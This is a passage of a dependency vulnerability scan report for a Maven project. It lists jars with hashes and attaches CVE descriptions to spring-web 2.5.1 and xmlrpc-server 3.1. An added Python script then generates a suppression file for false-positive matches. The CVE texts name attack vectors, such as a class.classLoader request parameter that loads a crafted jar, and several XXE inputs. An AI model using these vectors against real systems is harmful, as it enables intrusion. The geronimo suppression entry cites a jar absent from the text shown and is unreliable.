File Path: /Users/Kevin/.m2/repository/org/springframework/spring-web/2.5.1/spring-web-2.5.1.jar
MD5: 1c23331319bd9e110e1165ffb4d69281
SHA1: d9d2cd14ad9e0e9a9107af7c390dcfa156451614
SHA256:c2ddf7abcb6a6fbcfda05cab754c54a99888c08e4981c967b3eaebdffc91d697
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:vmware:springsource_spring_framework:2.5.1  Confidence:Low  
  • maven: org.springframework:spring-web:2.5.1  Confidence:Highest
  • cpe: cpe:/a:pivotal:spring_framework:2.5.1  Confidence:Low  
  • cpe: cpe:/a:pivotal_software:spring_framework:2.5.1  Confidence:Low  
  • cpe: cpe:/a:springsource:spring_framework:2.5.1  Confidence:Highest  

CVE-2010-1622  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Vulnerable Software & Versions:

CVE-2011-2730  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-16 Configuration

VMware SpringSource Spring Framework before 2.5.6.SEC03, 2.5.7.SR023, and 3.x before 3.0.6, when a container supports Expression Language (EL), evaluates EL expressions in tags twice, which allows remote attackers to obtain sensitive information via a (1) name attribute in a (a) spring:hasBindErrors tag; (2) path attribute in a (b) spring:bind or (c) spring:nestedpath tag; (3) arguments, (4) code, (5) text, (6) var, (7) scope, or (8) message attribute in a (d) spring:message or (e) spring:theme tag; or (9) var, (10) scope, or (11) value attribute in a (f) spring:transform tag, aka "Expression Language Injection."

Vulnerable Software & Versions:

CVE-2013-4152  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Spring OXM wrapper in Spring Framework before 3.2.4 and 4.0.0.M1, when using the JAXB marshaller, does not disable entity resolution, which allows context-dependent attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via an XML external entity declaration in conjunction with an entity reference in a (1) DOMSource, (2) StAXSource, (3) SAXSource, or (4) StreamSource, aka an XML External Entity (XXE) issue.

Vulnerable Software & Versions:

CVE-2013-6429  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The SourceHttpMessageConverter in Spring MVC in Spring Framework before 3.2.5 and 4.0.0.M1 through 4.0.0.RC1 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152 and CVE-2013-7315.

Vulnerable Software & Versions:

CVE-2013-7315  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Spring MVC in Spring Framework before 3.2.4 and 4.0.0.M1 through 4.0.0.M2 does not disable external entity resolution for the StAX XMLInputFactory, which allows context-dependent attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML with JAXB, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152. NOTE: this issue was SPLIT from CVE-2013-4152 due to different affected versions.

Vulnerable Software & Versions:

CVE-2014-0054  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

The Jaxb2RootElementHttpMessageConverter in Spring MVC in Spring Framework before 3.2.8 and 4.0.0 before 4.0.2 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-4152, CVE-2013-7315, and CVE-2013-6429.

Vulnerable Software & Versions:

CVE-2014-1904  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Cross-site scripting (XSS) vulnerability in web/servlet/tags/form/FormTag.java in Spring MVC in Spring Framework 3.0.0 before 3.2.8 and 4.0.0 before 4.0.2 allows remote attackers to inject arbitrary web script or HTML via the requested URI in a default action.

Vulnerable Software & Versions:

CVE-2016-9878  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

An issue was discovered in Pivotal Spring Framework before 3.2.18, 4.2.x before 4.2.9, and 4.3.x before 4.3.5. Paths provided to the ResourceServlet were not properly sanitized and as a result exposed to directory traversal attacks.

Vulnerable Software & Versions:

CVE-2018-1270  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-358 Improperly Implemented Security Check for Standard

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.

Vulnerable Software & Versions:

CVE-2018-1271  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead to a directory traversal attack.

Vulnerable Software & Versions:

CVE-2018-1272  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When a Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could lead to privilege escalation, for example, if the part content represents a username or user roles.

Vulnerable Software & Versions:

xmlrpc-server-3.1.jar

File Path: /Users/Kevin/.m2/repository/org/apache/xmlrpc/xmlrpc-server/3.1/xmlrpc-server-3.1.jar
MD5: 7f6cfbfab89cde69b4a4541f8c8824fb
SHA1: e5d7c821560950cec129f787a840e1d22ddb93d5
SHA256:44bf076bf5cb4b5ef81fcd92069e53ef8b1e4564ac2405208d140fd35eb6394d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.xmlrpc:xmlrpc-server:3.1  Confidence:Highest
  • cpe: cpe:/a:apache:xml-rpc:3.1.3  Confidence:Low  

CVE-2016-5002  

Severity:High
CVSS Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

XML external entity (XXE) vulnerability in the Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted DTD.

Vulnerable Software & Versions:

atlassian-xmlrpc-binder-server-spring-0.8.2.jar

File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder-server-spring/0.8.2/atlassian-xmlrpc-binder-server-spring-0.8.2.jar
MD5: 7a0faf307a48729a74923f3a0cd1f536
SHA1: 6c63b04d743b480dc0191a7f2436bd11b75acff3
SHA256:2ce7c7f5a7e8b2dc5f59b87d911112c0e6078bcc648120e8d22d4010de7f2823
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder-server-spring:0.8.2  Confidence:Highest
  • cpe: cpe:/a:apache:xml-rpc:0.8.2  Confidence:Low  

ws-commons-util-1.0.2.jar

Description:

 This is a small collection of utility classes that allow high-performance XML processing based on SAX. Basically, it is assumed that you are using a JAXP 1.1 compliant XML parser and nothing else. In particular, no dependency on the javax.xml.transform package is introduced.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/ws/commons/util/ws-commons-util/1.0.2/ws-commons-util-1.0.2.jar
MD5: e0d2efe441e2dec803c7749c10725f61
SHA1: 3f478e6def772c19d1053f61198fa1f6a6119238
SHA256:97c183d35b596c6a010dfea967ca1e67f67696806535dcef5be17ffb2692cfd6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.ws.commons.util:ws-commons-util:1.0.2  Confidence:Highest
  • cpe: cpe:/a:ws_project:ws:1.0.2  Confidence:Low  

CVE-2016-10542  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

ws is a "simple to use, blazing fast and thoroughly tested websocket client, server and console for node.js, up-to-date against RFC-6455". By sending an overly long websocket payload to a `ws` server, it is possible to crash the node process. This affects ws 1.1.0 and earlier.

Vulnerable Software & Versions:
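CVE-2016-10542, by its own description, concerns the Node.js `ws` package; it reaches ws-commons-util-1.0.2.jar only through the Low-confidence CPE cpe:/a:ws_project:ws:1.0.2. The same pattern of a Low-confidence CPE hanging off a jar whose name merely resembles a product appears elsewhere in this report (geronimo-spec-jta-1.0.1B-rc2.jar matched to cpe:/a:apache:geronimo:1.0.1, the Atlassian binder jars matched to cpe:/a:apache:xml-rpc:0.8.2). The Python below is an added example, not part of the report or of Dependency-Check: it turns triage decisions into a suppression file in the tool's documented format, keyed on each jar's SHA1 from the report so the suppression never silently covers a different build of the same artifact, and reads the file back so the result can be checked. The TRIAGE entries and their notes are this example's own assumptions; the geronimo decision in particular is a triage judgement to confirm, not a fact the report states. The schema namespace is the one the project's documentation publishes for the 1.3 suppression schema; check it against the version of the tool you run.

```python
"""Generate a Dependency-Check suppression file from triage decisions.

Added example; not part of the report or of Dependency-Check. Element names
(suppress, notes, sha1, cpe, cve) and the namespace follow the suppression file
format the project documents; confirm the namespace against your tool version.
"""
import xml.etree.ElementTree as ET

SUPPRESSION_NS = "https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd"

# Triage decisions for this report (constructed for the example). The SHA1 is the
# digest the report prints for the jar; the CPE is the Low-confidence match to drop.
# Suppressing the CPE removes that identifier and every CVE attached through it;
# listing individual CVEs instead keeps the CPE and drops only those CVEs.
TRIAGE = [
    {
        "sha1": "3f478e6def772c19d1053f61198fa1f6a6119238",   # ws-commons-util-1.0.2.jar
        "cpe": "cpe:/a:ws_project:ws",
        "cves": ["CVE-2016-10542"],
        "notes": "Java SAX utility jar matched to the Node.js 'ws' package; "
                 "CVE-2016-10542 is a Node.js issue (false positive).",
    },
    {
        "sha1": "3f4da55af12c3f8b1b36bc411d1915733b52cddc",   # geronimo-spec-jta-1.0.1B-rc2.jar
        "cpe": "cpe:/a:apache:geronimo",
        "cves": [],
        "notes": "JTA API spec jar matched (Low confidence) to the Apache Geronimo server. "
                 "Triage assumption: the server init-script and form-parameter CVEs do not "
                 "apply to the interface jar; re-check if the jar is replaced.",
    },
]


def _is_sha1(digest: str) -> bool:
    """A SHA1 hex digest is exactly 40 hex characters; anything else would never match a jar."""
    return len(digest) == 40 and all(ch in "0123456789abcdef" for ch in digest.lower())


def build_suppressions(triage: list) -> str:
    """Return the suppression XML document as a string, one <suppress> per triage entry."""
    ET.register_namespace("", SUPPRESSION_NS)   # serialize as the default namespace
    root = ET.Element(f"{{{SUPPRESSION_NS}}}suppressions")
    for entry in triage:
        if not _is_sha1(entry["sha1"]):
            raise ValueError(f"not a SHA1 hex digest: {entry['sha1']!r}")
        sup = ET.SubElement(root, f"{{{SUPPRESSION_NS}}}suppress")
        ET.SubElement(sup, f"{{{SUPPRESSION_NS}}}notes").text = entry["notes"]
        ET.SubElement(sup, f"{{{SUPPRESSION_NS}}}sha1").text = entry["sha1"].lower()
        ET.SubElement(sup, f"{{{SUPPRESSION_NS}}}cpe").text = entry["cpe"]
        for cve in entry["cves"]:
            ET.SubElement(sup, f"{{{SUPPRESSION_NS}}}cve").text = cve
    return '<?xml version="1.0" encoding="UTF-8"?>\n' + ET.tostring(root, encoding="unicode")


def parse_suppressions(xml_text: str) -> list:
    """Read a suppression file back into plain dicts, to review what will actually be suppressed."""
    ns = {"s": SUPPRESSION_NS}
    root = ET.fromstring(xml_text)
    entries = []
    for sup in root.findall("s:suppress", ns):
        entries.append({
            "sha1": sup.findtext("s:sha1", namespaces=ns),
            "cpe": sup.findtext("s:cpe", namespaces=ns),
            "cves": [c.text for c in sup.findall("s:cve", ns)],
            "notes": sup.findtext("s:notes", namespaces=ns),
        })
    return entries


if __name__ == "__main__":
    document = build_suppressions(TRIAGE)
    print(document)
    for entry in parse_suppressions(document):
        print(entry["sha1"], entry["cpe"], entry["cves"])
```

Write the output to a file and hand it to the scanner (the CLI takes it via `--suppression`, the Maven plugin via its suppression file parameter; see the tool's own documentation for the exact parameter name in your version). Keeping the notes element populated matters more than it looks: the next person to read the file needs to know whether a suppression was a confirmed false positive or an assumption that has to be revisited when the jar changes.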

atlassian-xmlrpc-binder-support-0.8.2.jar

File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder-support/0.8.2/atlassian-xmlrpc-binder-support-0.8.2.jar
MD5: be3c899f63cdff9e526b18460907ef7f
SHA1: b31a9a68e2ef882000c31fe856760ae4d7b46293
SHA256:d16ac5d3f39d8561c64090b9eab40ecea0e7e448abfe46692233aa16fbd1f9e5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder-support:0.8.2  Confidence:Highest

atlassian-xmlrpc-binder-server-0.8.2.jar

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder-server/0.8.2/atlassian-xmlrpc-binder-server-0.8.2.jar
MD5: c9b77d8c772493c6b92fabfea618c5fa
SHA1: d6ee40622987871abb31eeee4bf03a7f17ea0e7c
SHA256:cde605e0497e0697ba258c0a03842663b0fb6edc95c7a5c8952e73beb9818cfd
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder-server:0.8.2  Confidence:Highest

atlassian-xmlrpc-binder-annotations-0.8.2.jar

File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder-annotations/0.8.2/atlassian-xmlrpc-binder-annotations-0.8.2.jar
MD5: daffba99a45f8183e3f3fe5e4efb9b63
SHA1: b4d14cc160d019ee5365570856621a77d80ac213
SHA256:3e6c457503eeafe0d748c9a951576e1aa25d173d6bf351da98076622b2491c76
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder-annotations:0.8.2  Confidence:Highest

atlassian-xmlrpc-binder-0.8.2.jar

File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder/0.8.2/atlassian-xmlrpc-binder-0.8.2.jar
MD5: 529d5964f47e49f3cfef843021531c6d
SHA1: ec50fd85f0604d0fde8a5fe55c61fd8c62117dde
SHA256:e1376d47afcb75e95f5a56f2f5dfe0ee6989404e6959d751f028143e81fa26b7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder:0.8.2  Confidence:Highest

slf4j-log4j12-1.5.0.jar

Description:

 The slf4j log4j-12 binding

File Path: /Users/Kevin/.m2/repository/org/slf4j/slf4j-log4j12/1.5.0/slf4j-log4j12-1.5.0.jar
MD5: e70665b12f90cd2089e00e3ea898f9e3
SHA1: aad1074d37a63f19fafedd272dc7830f0f41a977
SHA256:c23ecab161aa16467ada68c6073f1ace58b4bfc8a5865e2575cbe2fb2aed1d46
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.slf4j:slf4j-log4j12:1.5.0  Confidence:Highest
  • cpe: cpe:/a:slf4j:slf4j:1.5.0  Confidence:Low  

maven-plugin-api-2.0.jar

Description:

 Maven is a project development management and comprehension tool. Based on the concept of a project object model: builds, dependency management, documentation creation, site publication, and distribution publication are all controlled from the declarative file. Maven can be extended by plugins to utilise a number of other development tools for reporting or the build process.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-plugin-api/2.0/maven-plugin-api-2.0.jar
MD5: c714c3aeccb4077866231655c08d4e3f
SHA1: 163ff2bc46c56d26e37e82a2cd79408c394a01e2
SHA256:5b62626069d85bb463314572734988d47bc98aab9f0ed48d2f1f9554960f5a35
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-plugin-api:2.0  Confidence:Highest

maven-shared-io-1.0.jar

Description:

 Basic API for lightweight logging

File Path: /Users/Kevin/.m2/repository/org/apache/maven/shared/maven-shared-io/1.0/maven-shared-io-1.0.jar
MD5: 915fe319be8f71e41646d588cab87ab4
SHA1: 6ba6241653b04c174bdcbc73829ca719f353f24d
SHA256:62a4d7ab57706fbdbad89ad55f21cdf63ede5e8a5323b528d6c330e3fd36b1d2
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.shared:maven-shared-io:1.0  Confidence:Highest

file-management-1.1.jar

Description:

 Basic API for lightweight logging

File Path: /Users/Kevin/.m2/repository/org/apache/maven/shared/file-management/1.1/file-management-1.1.jar
MD5: 48c2abe6b3a5045649714d06eceb6bbd
SHA1: 1a751b5b40520478458f31dca58d763c34580755
SHA256:b7d139b2a04687d399fb296a1d6c1d7925b54a65c2ace87b1cd4ea20e3d422c1
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.shared:file-management:1.1  Confidence:Highest

plexus-utils-1.5.4.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-utils/1.5.4/plexus-utils-1.5.4.jar
MD5: 602b8b5ed32782f8cc42b9a216a9d8d9
SHA1: dedb557166fbd043f54928baa9134c00e73b8abf
SHA256:b5035e5abfd9d3c73c9311a5ac54de59248d1242ee5fa47212d0fcb097b1cd1e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-utils:1.5.4  Confidence:Highest

plexus-classworlds-1.2-alpha-7.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-classworlds/1.2-alpha-7/plexus-classworlds-1.2-alpha-7.jar
MD5: b00a4521e82cd7cdf502039dd59a1ffb
SHA1: ed03d1eeb9b2576747df0d2883d9006fa5e1febe
SHA256:8d0b03d23ab40c94db71f93bd64b2fdd525d86dda3f4b40474fb9eb27c369f96
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-classworlds:1.2-alpha-7  Confidence:Highest

junit-3.8.1.jar

Description:

 JUnit is a regression testing framework written by Erich Gamma and Kent Beck. It is used by the developer who implements unit tests in Java.

License:

Common Public License Version 1.0: http://www.opensource.org/licenses/cpl1.0.txt
File Path: /Users/Kevin/.m2/repository/junit/junit/3.8.1/junit-3.8.1.jar
MD5: 1f40fb782a4f2cf78f161d32670f7a3a
SHA1: 99129f16442844f6a4a11ae22fbbee40b14d774f
SHA256:b58e459509e190bed737f3592bc1950485322846cf10e78ded1d065153012d70
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: junit:junit:3.8.1  Confidence:Highest

plexus-component-api-1.0-alpha-19.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-component-api/1.0-alpha-19/plexus-component-api-1.0-alpha-19.jar
MD5: 0c262ada46d9b749a76cab5a3fd7fc1b
SHA1: 9e375389c203bdd31a73f3ca6d1bd7e015deb3f1
SHA256:a9d96e7c8240901169559ce2a6fc2f1621d61331d4fde0859d77afbddf8f8991
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-component-api:1.0-alpha-19  Confidence:Highest

backport-util-concurrent-3.0.jar

Description:

 Dawid Kurzyniec's backport of JSR 166

License:

Public Domain: http://creativecommons.org/licenses/publicdomain
File Path: /Users/Kevin/.m2/repository/backport-util-concurrent/backport-util-concurrent/3.0/backport-util-concurrent-3.0.jar
MD5: 6ab04326a80e57fd8972d50640a14088
SHA1: a193f67b87fe7782a13f1031dce4fa822c0e3599
SHA256:376155ee3d0eee07a89aaf09c1ce43fc6e24d073ce03dafbc382e9aac66a917e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: backport-util-concurrent:backport-util-concurrent:3.0  Confidence:Highest

plexus-taskqueue-1.0-alpha-8.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-taskqueue/1.0-alpha-8/plexus-taskqueue-1.0-alpha-8.jar
MD5: d70dfef01fc8fd62672d57ed2bdc6fb8
SHA1: b50820160f0a471b783843526b225b65bfaeb237
SHA256:b60d41607085795ef81d6f125cf45b3ab370cf2f8f14d538f6946b801d9137d7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-taskqueue:1.0-alpha-8  Confidence:Highest

plexus-action-1.0-alpha-6.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-action/1.0-alpha-6/plexus-action-1.0-alpha-6.jar
MD5: 74e61c8cbeaec660b6e8225d0971cf67
SHA1: 94d6b8cbb03e5352dda96360ad350c60d98a6145
SHA256:04b4459f54cc1acaa7fd2b5362652ac08ee9e88775a6fb214e5c2c7ac2fe46fc
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-action:1.0-alpha-6  Confidence:Highest

plexus-command-line-1.0-alpha-2.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-command-line/1.0-alpha-2/plexus-command-line-1.0-alpha-2.jar
MD5: 29580c08fcdc92c7c5675e6856033ae3
SHA1: 315d341a1bad7bdbacec10f2858807942e695af8
SHA256:0498f74932ffe4b19a40031bb76481c6ef0ad4fe72b9dc10d814deda75694030
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-command-line:1.0-alpha-2  Confidence:Highest

plexus-interactivity-api-1.0-alpha-6.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-6/plexus-interactivity-api-1.0-alpha-6.jar
MD5: 4f3e3b8a34729e317e4c2484016ca151
SHA1: c06f0eb818633033f09a87d14c4cfb6f39af9a37
SHA256:4009db61dc8bc1ab5895bf5195718fd4df84998409e15acfb9aa796895ceddbf
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-interactivity-api:1.0-alpha-6  Confidence:Highest

maven-scm-manager-plexus-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-manager-plexus/1.0/maven-scm-manager-plexus-1.0.jar
MD5: 90f1e4f233268f07f731b01cbb48b1fb
SHA1: bbcfe0ba800dc3c43e52bb62ef47ab8034f6081c
SHA256:4730522a2409fbd289050cdf8338f24d9021ea7ad5c04a104ad112ae9fd8ec37
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-manager-plexus:1.0  Confidence:Highest

regexp-1.3.jar

File Path: /Users/Kevin/.m2/repository/regexp/regexp/1.3/regexp-1.3.jar
MD5: 6dcdc325850e40b843cac2a25fb2121e
SHA1: 973df2b78b67bcd3144c3dbbb88da691065a3f8d
SHA256:27998732ecd5745924644f891f41adaf73736fe259a0a20843979452574f0385
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: regexp:regexp:1.3  Confidence:Highest

maven-scm-provider-bazaar-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-bazaar/1.0/maven-scm-provider-bazaar-1.0.jar
MD5: 8c3ca2128efca24b8813c3dd04e96dd3
SHA1: 39e76acec7879b25fedb76f429bdd389b7694f8e
SHA256:bc8c8bb235b87211afa6e7745e3f5b82b9afd85f7716439b2cc63d98245e7217
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-bazaar:1.0  Confidence:Highest

maven-scm-provider-clearcase-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-clearcase/1.0/maven-scm-provider-clearcase-1.0.jar
MD5: 7c2880aa644ea153b1999f84c44c712f
SHA1: 3f2c8a21974336eab5e556193c3c552c1e8324e7
SHA256:e9881b07c7dc737f287fb9f5406ddc15cc0d3f1b67aaf78a14fd8a086085f33d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-clearcase:1.0  Confidence:Highest

maven-scm-provider-cvsexe-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-cvsexe/1.0/maven-scm-provider-cvsexe-1.0.jar
MD5: 0a6a7dcad41d7c288f29d6b799989c20
SHA1: b063e4b0ffafd5c7bd4a7986464aca765e7ef127
SHA256:51b4525521299b7160d12ec1d18ebf6683fb4769bc936ba2574ae97319ed5a4e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-cvsexe:1.0  Confidence:Highest

cvsclient-20060125.jar

License:

Sun Public License: http://www.netbeans.org/about/legal/spl.html
File Path: /Users/Kevin/.m2/repository/org/netbeans/lib/cvsclient/20060125/cvsclient-20060125.jar
MD5: d37c0e11f9b2d3fdde5a999ba9418abb
SHA1: cc80bd0085c79be7ed332cbdc1db77498bff1fda
SHA256:89baed753b393d5074d4b9b4ba4b9692af6cd0713199998fb294b99942c820a3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.netbeans.lib:cvsclient:20060125  Confidence:Highest

ganymed-ssh2-build210.jar

Description:

 Ganymed SSH2 for Java is a library which implements the SSH-2 protocol in pure Java

License:

BSD style license: http://www.ganymed.ethz.ch/ssh2/LICENSE.txt
File Path: /Users/Kevin/.m2/repository/ch/ethz/ganymed/ganymed-ssh2/build210/ganymed-ssh2-build210.jar
MD5: d898fe406a32b5c55283c719cb48328b
SHA1: b2f81c85a7a2a1b43727d2582710af85c979050b
SHA256:ee53bd7b41e1a45e1a263eca8ebbfc0b7acf4f9c442f4e707710c6599b80fcd5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: ch.ethz.ganymed:ganymed-ssh2:build210  Confidence:Highest

maven-scm-provider-cvsjava-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-cvsjava/1.0/maven-scm-provider-cvsjava-1.0.jar
MD5: 0c2297a4e6dea48ff1a7149f366c753c
SHA1: 30da1cd389c8cc8dacc55b5c0393cc88510868d0
SHA256:39a4fea7d80966f446be883cacd824c03280706e3ce57981cc0003f1058cb1fa
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-cvsjava:1.0  Confidence:Highest

maven-scm-provider-hg-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-hg/1.0/maven-scm-provider-hg-1.0.jar
MD5: dbc2591642d096b1e6708e9050ef6980
SHA1: 65be347b1e595e8569bb69e762b53eb5cf972cf0
SHA256:e15a6fcd13b077d9f7cee50647b54a6430c2930dc6b97f42832f0a2a7f45bf6b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-hg:1.0  Confidence:Highest

maven-scm-provider-perforce-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-perforce/1.0/maven-scm-provider-perforce-1.0.jar
MD5: 932c412e13615873f47ddcfb43c3cd83
SHA1: 8d4e631f11688a102ed6905e08e66a536ff7fedc
SHA256:2d05bd2e9273eaebf98e2984f66608546520e57b211da399aa2e718a8df59283
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-perforce:1.0  Confidence:Highest

maven-scm-provider-starteam-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-starteam/1.0/maven-scm-provider-starteam-1.0.jar
MD5: ccd5be49cc58ee6c699f185530219fee
SHA1: 4cd940529154e36386ddeab9ebd365eafd130c7f
SHA256:699dcdf0ed2ee84c22372d780b9b6bc6df94c95668d968783c6ea525675fb445
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-starteam:1.0  Confidence:Highest

maven-scm-provider-svnexe-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-svnexe/1.0/maven-scm-provider-svnexe-1.0.jar
MD5: 962c8d753de818c1ebcc643bf585a88a
SHA1: 3ea987bb241773454acf4c5738e5250757e2dcda
SHA256:6a45753fbaae26435aae5fbf2b4c31bbd65b49dc0f7e8ef39b50a7717f471bc8
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-svnexe:1.0  Confidence:Highest

maven-scm-provider-synergy-1.0.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-synergy/1.0/maven-scm-provider-synergy-1.0.jar
MD5: a7fb33175376ba79f699d290f0257edb
